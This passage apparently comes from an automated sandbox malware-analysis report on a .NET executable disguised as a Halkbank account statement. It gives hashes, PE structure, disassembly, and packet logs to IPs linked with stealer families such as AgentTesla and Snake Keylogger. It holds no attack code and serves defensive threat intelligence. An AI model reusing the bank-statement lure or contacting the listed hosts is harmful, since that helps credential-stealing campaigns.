                                                            • 172.67.177.134
                                                            DEKONT.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                            • 172.67.177.134
                                                            3b5074b1b5d032e5620f69f9f700ff0enoa.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                            • 104.21.27.85
                                                            GX_MV Sunshine 07483032r_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 104.21.27.85
                                                            JlvRdFpwOD.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRATBrowse
                                                            • 104.21.27.85
                                                            wmiclnt.dllGet hashmaliciousUnknownBrowse
                                                            • 104.21.27.85
                                                            setup.msiGet hashmaliciousUnknownBrowse
                                                            • 104.21.27.85
                                                            Setup (1).msiGet hashmaliciousUnknownBrowse
                                                            • 104.21.27.85
                                                            product.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 104.21.27.85
                                                            cXPFfk0pBp7bEsb.pif.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                            • 104.21.27.85
                                                            SOA.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                            • 104.21.27.85
                                                            Dekontu.lnk.lnkGet hashmaliciousUnknownBrowse
                                                            • 104.21.27.85

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Halkbank_Ekstre_20230426_075819_154055.exe.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1216
                                                            Entropy (8bit):5.34331486778365
                                                            Encrypted:false
                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                            Malicious:false
                                                            Reputation:high, very likely benign file
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Entropy (8bit):7.3360543528332585
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            • DOS Executable Generic (2002/1) 0.01%
                                                            File name:Halkbank_Ekstre_20230426_075819_154055.exe
                                                            File size:877'056 bytes
                                                            MD5:42199f4a8e3d9fe6ce26a7d4922afec7
                                                            SHA1:4e7547a14798f7c4520fab21ea2e34989bf27bc7
                                                            SHA256:9745e0d21f50b1c553b40e8c353b11bb172a2bae1a83b3b9cfce26f9e01b3b89
                                                            SHA512:3d4e92428c11f2c5df88550abae2ff0dc9dc74629b0d6943836445d594cfc2d856bd08e7c9ee51507bfd9d1a9909f97d1c21e1804637f4bacdc7bfe8d05491d2
                                                            SSDEEP:12288:xUE2iNdlONhj8Z/SMfIi6D0zgghZPebvoI9P2WcyHdSFYQ:V1PlONV8ZrfdKcovoWuWb95
                                                            TLSH:89154DD1F190CC9AED6B05F1AD2BA53014A3BE9D54A4810C569EBB1B76F3342209FE1F
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....p/...............0.................. ........@.. ....................................@................................

                                                            File Icon

                                                            Icon Hash:aea4accc16a3d9be

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x48f0b2
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0xF32F70C2 [Wed Apr 15 21:42:26 2099 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                            Entrypoint Preview

                                                            Instruction
                                                            jmp dword ptr [00402000h]
                                                            xor byte ptr [eax], bh
                                                            xor al, 53h
                                                            cmp byte ptr [eax], bh
                                                            inc esi
                                                            dec eax
                                                            xor eax, 00000038h
                                                            add byte ptr [eax], al
                                                            add byte ptr [edi+35h], cl
                                                            inc ebp
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [41464854h+esi], dh
                                                            dec eax
                                                            xor dh, byte ptr [eax+eax]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x8f0600x4f.text
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x900000x48b00.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xda0000xc.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x8d23c0x70.text
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x20000x8d0e00x8d200498d47208cef79fa1462fa54e058b724False0.9555123449955713OpenPGP Secret Key7.95952575244103IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rsrc0x900000x48b000x48c0039000a27b6f101937faf6ae067616188False0.06334903887457044data4.769995776757593IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc0xda0000xc0x200a9a900f6c552168a2fb9d304e8077375False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                            Resources

                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_ICON0x902e00x668Device independent bitmap graphic, 48 x 96 x 4, image size 00.1798780487804878
                                                            RT_ICON0x909480x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 00.2513440860215054
                                                            RT_ICON0x90c300x128Device independent bitmap graphic, 16 x 32 x 4, image size 00.3918918918918919
                                                            RT_ICON0x90d580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.3200959488272921
                                                            RT_ICON0x91c000x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.33664259927797835
                                                            RT_ICON0x924a80x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.2622832369942196
                                                            RT_ICON0x92a100x42028Device independent bitmap graphic, 256 x 512 x 32, image size 00.04393141403083114
                                                            RT_ICON0xd4a380x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.18786307053941909
                                                            RT_ICON0xd6fe00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.2453095684803002
                                                            RT_ICON0xd80880x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.3484042553191489
                                                            RT_GROUP_ICON0xd84f00x92data0.5753424657534246
                                                            RT_VERSION0xd85840x390data0.42214912280701755
                                                            RT_MANIFEST0xd89140x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                            Imports

                                                            DLLImport
                                                            mscoree.dll_CorExeMain

                                                            Network Behavior

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            May 2, 2024 11:54:53.091320038 CEST4970680192.168.2.5132.226.247.73
                                                            May 2, 2024 11:54:53.286735058 CEST8049706132.226.247.73192.168.2.5
                                                            May 2, 2024 11:54:53.286820889 CEST4970680192.168.2.5132.226.247.73
                                                            May 2, 2024 11:54:53.320055008 CEST4970680192.168.2.5132.226.247.73
                                                            May 2, 2024 11:54:53.515486956 CEST8049706132.226.247.73192.168.2.5
                                                            May 2, 2024 11:54:53.516165018 CEST8049706132.226.247.73192.168.2.5
                                                            May 2, 2024 11:54:53.567297935 CEST4970680192.168.2.5132.226.247.73
                                                            May 2, 2024 11:54:54.891679049 CEST4970680192.168.2.5132.226.247.73
                                                            May 2, 2024 11:54:55.088221073 CEST8049706132.226.247.73192.168.2.5
                                                            May 2, 2024 11:54:55.129764080 CEST4970680192.168.2.5132.226.247.73
                                                            May 2, 2024 11:54:55.262778044 CEST49708443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:54:55.262823105 CEST44349708172.67.177.134192.168.2.5
                                                            May 2, 2024 11:54:55.262890100 CEST49708443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:54:55.267750025 CEST49708443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:54:55.267762899 CEST44349708172.67.177.134192.168.2.5
                                                            May 2, 2024 11:54:55.455048084 CEST44349708172.67.177.134192.168.2.5
                                                            May 2, 2024 11:54:55.455122948 CEST49708443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:54:55.464555025 CEST49708443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:54:55.464575052 CEST44349708172.67.177.134192.168.2.5
                                                            May 2, 2024 11:54:55.464842081 CEST44349708172.67.177.134192.168.2.5
                                                            May 2, 2024 11:54:55.504774094 CEST49708443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:54:55.770773888 CEST49708443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:54:55.816113949 CEST44349708172.67.177.134192.168.2.5
                                                            May 2, 2024 11:54:55.872474909 CEST44349708172.67.177.134192.168.2.5
                                                            May 2, 2024 11:54:55.872586012 CEST44349708172.67.177.134192.168.2.5
                                                            May 2, 2024 11:54:55.872638941 CEST49708443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:54:55.879030943 CEST49708443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:54:55.885077000 CEST4970680192.168.2.5132.226.247.73
                                                            May 2, 2024 11:54:56.081897974 CEST8049706132.226.247.73192.168.2.5
                                                            May 2, 2024 11:54:56.122875929 CEST49709443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:54:56.122916937 CEST44349709172.67.177.134192.168.2.5
                                                            May 2, 2024 11:54:56.123003960 CEST49709443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:54:56.126746893 CEST49709443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:54:56.126777887 CEST44349709172.67.177.134192.168.2.5
                                                            May 2, 2024 11:54:56.176695108 CEST4970680192.168.2.5132.226.247.73
                                                            May 2, 2024 11:54:56.310097933 CEST44349709172.67.177.134192.168.2.5
                                                            May 2, 2024 11:54:56.312459946 CEST49709443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:54:56.312480927 CEST44349709172.67.177.134192.168.2.5
                                                            May 2, 2024 11:54:56.535454988 CEST44349709172.67.177.134192.168.2.5
                                                            May 2, 2024 11:54:56.535554886 CEST44349709172.67.177.134192.168.2.5
                                                            May 2, 2024 11:54:56.535602093 CEST49709443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:54:56.536367893 CEST49709443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:54:56.540188074 CEST4970680192.168.2.5132.226.247.73
                                                            May 2, 2024 11:54:56.541445971 CEST4971080192.168.2.5132.226.247.73
                                                            May 2, 2024 11:54:56.735527992 CEST8049706132.226.247.73192.168.2.5
                                                            May 2, 2024 11:54:56.735589027 CEST4970680192.168.2.5132.226.247.73
                                                            May 2, 2024 11:54:56.736934900 CEST8049710132.226.247.73192.168.2.5
                                                            May 2, 2024 11:54:56.737016916 CEST4971080192.168.2.5132.226.247.73
                                                            May 2, 2024 11:54:56.737152100 CEST4971080192.168.2.5132.226.247.73
                                                            May 2, 2024 11:54:56.932909012 CEST8049710132.226.247.73192.168.2.5
                                                            May 2, 2024 11:54:56.935266972 CEST8049710132.226.247.73192.168.2.5
                                                            May 2, 2024 11:54:56.936484098 CEST49711443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:54:56.936517954 CEST44349711172.67.177.134192.168.2.5
                                                            May 2, 2024 11:54:56.936580896 CEST49711443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:54:56.936877966 CEST49711443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:54:56.936887980 CEST44349711172.67.177.134192.168.2.5
                                                            May 2, 2024 11:54:57.119395971 CEST44349711172.67.177.134192.168.2.5
                                                            May 2, 2024 11:54:57.121077061 CEST49711443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:54:57.121095896 CEST44349711172.67.177.134192.168.2.5
                                                            May 2, 2024 11:54:57.161042929 CEST4971080192.168.2.5132.226.247.73
                                                            May 2, 2024 11:54:57.344532013 CEST44349711172.67.177.134192.168.2.5
                                                            May 2, 2024 11:54:57.344650030 CEST44349711172.67.177.134192.168.2.5
                                                            May 2, 2024 11:54:57.344707966 CEST49711443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:54:57.345171928 CEST49711443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:54:57.350186110 CEST4971380192.168.2.5132.226.247.73
                                                            May 2, 2024 11:54:57.545598984 CEST8049713132.226.247.73192.168.2.5
                                                            May 2, 2024 11:54:57.545669079 CEST4971380192.168.2.5132.226.247.73
                                                            May 2, 2024 11:54:57.545845032 CEST4971380192.168.2.5132.226.247.73
                                                            May 2, 2024 11:54:57.741249084 CEST8049713132.226.247.73192.168.2.5
                                                            May 2, 2024 11:54:57.780755043 CEST8049713132.226.247.73192.168.2.5
                                                            May 2, 2024 11:54:57.782798052 CEST49714443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:54:57.782829046 CEST44349714172.67.177.134192.168.2.5
                                                            May 2, 2024 11:54:57.782881975 CEST49714443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:54:57.783421040 CEST49714443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:54:57.783432961 CEST44349714172.67.177.134192.168.2.5
                                                            May 2, 2024 11:54:57.832902908 CEST4971380192.168.2.5132.226.247.73
                                                            May 2, 2024 11:54:57.965560913 CEST44349714172.67.177.134192.168.2.5
                                                            May 2, 2024 11:54:57.967274904 CEST49714443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:54:57.967293024 CEST44349714172.67.177.134192.168.2.5
                                                            May 2, 2024 11:54:58.190349102 CEST44349714172.67.177.134192.168.2.5
                                                            May 2, 2024 11:54:58.190463066 CEST44349714172.67.177.134192.168.2.5
                                                            May 2, 2024 11:54:58.190510035 CEST49714443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:54:58.191066980 CEST49714443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:54:58.194933891 CEST4971380192.168.2.5132.226.247.73
                                                            May 2, 2024 11:54:58.196075916 CEST4971680192.168.2.5132.226.247.73
                                                            May 2, 2024 11:54:58.390424013 CEST8049713132.226.247.73192.168.2.5
                                                            May 2, 2024 11:54:58.391537905 CEST8049716132.226.247.73192.168.2.5
                                                            May 2, 2024 11:54:58.393789053 CEST4971680192.168.2.5132.226.247.73
                                                            May 2, 2024 11:54:58.393790007 CEST4971380192.168.2.5132.226.247.73
                                                            May 2, 2024 11:54:58.397499084 CEST4971680192.168.2.5132.226.247.73
                                                            May 2, 2024 11:54:58.592816114 CEST8049716132.226.247.73192.168.2.5
                                                            May 2, 2024 11:54:58.593482971 CEST8049716132.226.247.73192.168.2.5
                                                            May 2, 2024 11:54:58.641685009 CEST4971680192.168.2.5132.226.247.73
                                                            May 2, 2024 11:54:58.669692039 CEST49717443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:54:58.669708967 CEST44349717172.67.177.134192.168.2.5
                                                            May 2, 2024 11:54:58.677678108 CEST49717443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:54:58.733688116 CEST49717443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:54:58.733704090 CEST44349717172.67.177.134192.168.2.5
                                                            May 2, 2024 11:54:58.916291952 CEST44349717172.67.177.134192.168.2.5
                                                            May 2, 2024 11:54:58.958184004 CEST49717443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:54:59.497109890 CEST49717443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:54:59.497124910 CEST44349717172.67.177.134192.168.2.5
                                                            May 2, 2024 11:54:59.596965075 CEST44349717172.67.177.134192.168.2.5
                                                            May 2, 2024 11:54:59.597079992 CEST44349717172.67.177.134192.168.2.5
                                                            May 2, 2024 11:54:59.597137928 CEST49717443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:54:59.761310101 CEST49717443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:54:59.863033056 CEST4971680192.168.2.5132.226.247.73
                                                            May 2, 2024 11:54:59.863650084 CEST4971880192.168.2.5132.226.247.73
                                                            May 2, 2024 11:55:00.058418036 CEST8049716132.226.247.73192.168.2.5
                                                            May 2, 2024 11:55:00.058476925 CEST4971680192.168.2.5132.226.247.73
                                                            May 2, 2024 11:55:00.059952974 CEST8049718132.226.247.73192.168.2.5
                                                            May 2, 2024 11:55:00.060022116 CEST4971880192.168.2.5132.226.247.73
                                                            May 2, 2024 11:55:00.060322046 CEST4971880192.168.2.5132.226.247.73
                                                            May 2, 2024 11:55:00.256793022 CEST8049718132.226.247.73192.168.2.5
                                                            May 2, 2024 11:55:00.257428885 CEST8049718132.226.247.73192.168.2.5
                                                            May 2, 2024 11:55:00.276922941 CEST49719443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:55:00.276948929 CEST44349719172.67.177.134192.168.2.5
                                                            May 2, 2024 11:55:00.277009010 CEST49719443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:55:00.277656078 CEST49719443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:55:00.277671099 CEST44349719172.67.177.134192.168.2.5
                                                            May 2, 2024 11:55:00.301645041 CEST4971880192.168.2.5132.226.247.73
                                                            May 2, 2024 11:55:00.460213900 CEST44349719172.67.177.134192.168.2.5
                                                            May 2, 2024 11:55:00.480860949 CEST49719443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:55:00.480884075 CEST44349719172.67.177.134192.168.2.5
                                                            May 2, 2024 11:55:00.685883999 CEST44349719172.67.177.134192.168.2.5
                                                            May 2, 2024 11:55:00.685995102 CEST44349719172.67.177.134192.168.2.5
                                                            May 2, 2024 11:55:00.686079979 CEST49719443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:55:00.690990925 CEST49719443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:55:00.719024897 CEST4971880192.168.2.5132.226.247.73
                                                            May 2, 2024 11:55:00.719731092 CEST4972080192.168.2.5132.226.247.73
                                                            May 2, 2024 11:55:00.916225910 CEST8049720132.226.247.73192.168.2.5
                                                            May 2, 2024 11:55:00.916323900 CEST4972080192.168.2.5132.226.247.73
                                                            May 2, 2024 11:55:00.916456938 CEST4972080192.168.2.5132.226.247.73
                                                            May 2, 2024 11:55:00.956132889 CEST8049718132.226.247.73192.168.2.5
                                                            May 2, 2024 11:55:00.961653948 CEST8049718132.226.247.73192.168.2.5
                                                            May 2, 2024 11:55:00.961709023 CEST4971880192.168.2.5132.226.247.73
                                                            May 2, 2024 11:55:01.112905025 CEST8049720132.226.247.73192.168.2.5
                                                            May 2, 2024 11:55:04.476000071 CEST8049720132.226.247.73192.168.2.5
                                                            May 2, 2024 11:55:04.521708012 CEST4972080192.168.2.5132.226.247.73
                                                            May 2, 2024 11:55:04.531945944 CEST49721443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:55:04.531975031 CEST44349721172.67.177.134192.168.2.5
                                                            May 2, 2024 11:55:04.532028913 CEST49721443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:55:04.532582045 CEST49721443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:55:04.532596111 CEST44349721172.67.177.134192.168.2.5
                                                            May 2, 2024 11:55:04.714554071 CEST44349721172.67.177.134192.168.2.5
                                                            May 2, 2024 11:55:04.716202974 CEST49721443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:55:04.716228008 CEST44349721172.67.177.134192.168.2.5
                                                            May 2, 2024 11:55:04.942008018 CEST44349721172.67.177.134192.168.2.5
                                                            May 2, 2024 11:55:04.942107916 CEST44349721172.67.177.134192.168.2.5
                                                            May 2, 2024 11:55:04.942179918 CEST49721443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:55:04.942900896 CEST49721443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:55:04.947160006 CEST4972080192.168.2.5132.226.247.73
                                                            May 2, 2024 11:55:04.947778940 CEST4972280192.168.2.5132.226.247.73
                                                            May 2, 2024 11:55:05.146770000 CEST8049722132.226.247.73192.168.2.5
                                                            May 2, 2024 11:55:05.146909952 CEST4972280192.168.2.5132.226.247.73
                                                            May 2, 2024 11:55:05.148523092 CEST4972280192.168.2.5132.226.247.73
                                                            May 2, 2024 11:55:05.148991108 CEST8049720132.226.247.73192.168.2.5
                                                            May 2, 2024 11:55:05.149069071 CEST4972080192.168.2.5132.226.247.73
                                                            May 2, 2024 11:55:05.345007896 CEST8049722132.226.247.73192.168.2.5
                                                            May 2, 2024 11:55:11.466059923 CEST8049722132.226.247.73192.168.2.5
                                                            May 2, 2024 11:55:11.467253923 CEST49723443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:55:11.467291117 CEST44349723172.67.177.134192.168.2.5
                                                            May 2, 2024 11:55:11.467353106 CEST49723443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:55:11.467582941 CEST49723443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:55:11.467596054 CEST44349723172.67.177.134192.168.2.5
                                                            May 2, 2024 11:55:11.520394087 CEST4972280192.168.2.5132.226.247.73
                                                            May 2, 2024 11:55:11.649024010 CEST44349723172.67.177.134192.168.2.5
                                                            May 2, 2024 11:55:11.692287922 CEST49723443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:55:11.708870888 CEST49723443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:55:11.708879948 CEST44349723172.67.177.134192.168.2.5
                                                            May 2, 2024 11:55:11.875636101 CEST44349723172.67.177.134192.168.2.5
                                                            May 2, 2024 11:55:11.875730038 CEST44349723172.67.177.134192.168.2.5
                                                            May 2, 2024 11:55:11.875777006 CEST49723443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:55:11.876225948 CEST49723443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:55:11.962460995 CEST4972280192.168.2.5132.226.247.73
                                                            May 2, 2024 11:55:12.066484928 CEST49726443192.168.2.5104.21.27.85
                                                            May 2, 2024 11:55:12.066507101 CEST44349726104.21.27.85192.168.2.5
                                                            May 2, 2024 11:55:12.066572905 CEST49726443192.168.2.5104.21.27.85
                                                            May 2, 2024 11:55:12.073910952 CEST49726443192.168.2.5104.21.27.85
                                                            May 2, 2024 11:55:12.073926926 CEST44349726104.21.27.85192.168.2.5
                                                            May 2, 2024 11:55:12.199290991 CEST8049722132.226.247.73192.168.2.5
                                                            May 2, 2024 11:55:12.207757950 CEST8049722132.226.247.73192.168.2.5
                                                            May 2, 2024 11:55:12.207818031 CEST4972280192.168.2.5132.226.247.73
                                                            May 2, 2024 11:55:12.261317015 CEST44349726104.21.27.85192.168.2.5
                                                            May 2, 2024 11:55:12.261429071 CEST49726443192.168.2.5104.21.27.85
                                                            May 2, 2024 11:55:12.272430897 CEST49726443192.168.2.5104.21.27.85
                                                            May 2, 2024 11:55:12.272448063 CEST44349726104.21.27.85192.168.2.5
                                                            May 2, 2024 11:55:12.272689104 CEST44349726104.21.27.85192.168.2.5
                                                            May 2, 2024 11:55:12.278451920 CEST49726443192.168.2.5104.21.27.85
                                                            May 2, 2024 11:55:12.324122906 CEST44349726104.21.27.85192.168.2.5
                                                            May 2, 2024 11:55:47.610687017 CEST44349726104.21.27.85192.168.2.5
                                                            May 2, 2024 11:55:47.610754013 CEST44349726104.21.27.85192.168.2.5
                                                            May 2, 2024 11:55:47.610830069 CEST49726443192.168.2.5104.21.27.85
                                                            May 2, 2024 11:55:47.651453018 CEST49726443192.168.2.5104.21.27.85
                                                            May 2, 2024 11:56:01.935303926 CEST8049710132.226.247.73192.168.2.5
                                                            May 2, 2024 11:56:01.935390949 CEST4971080192.168.2.5132.226.247.73

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            May 2, 2024 11:54:52.996556997 CEST5011253192.168.2.51.1.1.1
                                                            May 2, 2024 11:54:53.084842920 CEST53501121.1.1.1192.168.2.5
                                                            May 2, 2024 11:54:55.173474073 CEST5414253192.168.2.51.1.1.1
                                                            May 2, 2024 11:54:55.261873960 CEST53541421.1.1.1192.168.2.5
